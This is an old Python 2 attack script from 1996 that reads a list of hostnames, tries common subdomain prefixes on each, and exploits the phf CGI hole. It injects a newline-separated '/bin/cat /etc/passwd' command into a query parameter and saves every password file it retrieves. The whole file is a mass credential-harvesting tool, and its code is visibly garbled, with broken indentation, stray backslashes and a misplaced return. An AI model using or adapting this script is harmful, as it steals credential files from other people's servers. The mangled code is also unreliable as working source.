#!/usr/bin/python
#
# Web Searcher for passwd files using 'phf' permissions hole...
#
# Give it a file with one address per line and it will search
# certain combinations of the address, i.e., www.adress...
#
# A parsed zone file from Internic would probably be a good starting
# place!
#
# I threw this script together pretty quickly so please excuse the ugly
# code...
#
# ChezeHead 11/25/96
#
# Combination list of prefixes to try...
combos='', 'www', 'www.cs.', 'www.math.', 'www.physics.', 'www.engr.', 'www.lib.', 'www.cis.'

# Think of an import like a C #include
import string
import urllib
import os

# Function to convert . to _ for systems that can't use multiple .'s
def convert_link(link):
	temp=""
	for u in link:
 	     if u == '.':
		u = '_'
		temp = temp+u
		return temp

# get filename info, and open the file
filename = raw_input("Filename to Use? ")
logfilename = raw_input("Logname to Use? ")
output_path = raw_input("Output Path ")

print "Using filename "+filename+"..."
print "Adding to Logfile "+logfilename+"..."

hostfile = open(filename, 'r')
logfile = open(output_path + logfilename, 'a')

# My coding is a bit messy here but it does the job
flag = 0
while not flag:
	link = string.strip(hostfile.readline())
	if link != '':
  	   for u in combos:
		thislink = u+link
		print "Trying host: "+thislink

		# Attempt to retrieve the URL

		try:
	  	tempfile = urllib.urlretrieve("http://"+thislink+"/cgi-bin/phf?Jserver="\+"thislink%0A/bin/cat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Q"\+"nickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhighschool=&Q"\+"slip=HTTP/1.0")
		except:
	           print "Host "+thislink+" error connecting"
		   logfile.write("error connecting: ")

		    # For compressing the retrieved files you
		    # could use lines like these...
		    # os.system("/bin/compress "+tempfile[0])
		    # os.rename(tempfile[0]+".gz", output_path+
		    # convert_link(thislink+".gz"))
		  try:
		    os.rename(tempfile[0], output_path+convert_link(thislink))
		  except:
		     print "tempfile doesn't exist"
		     logfile.write(thislink+"\r\n")

		   if link == '':
		      flag = 1
		      # If you wish you could now do some
		      # clean up or extra parsing of the
		      # files...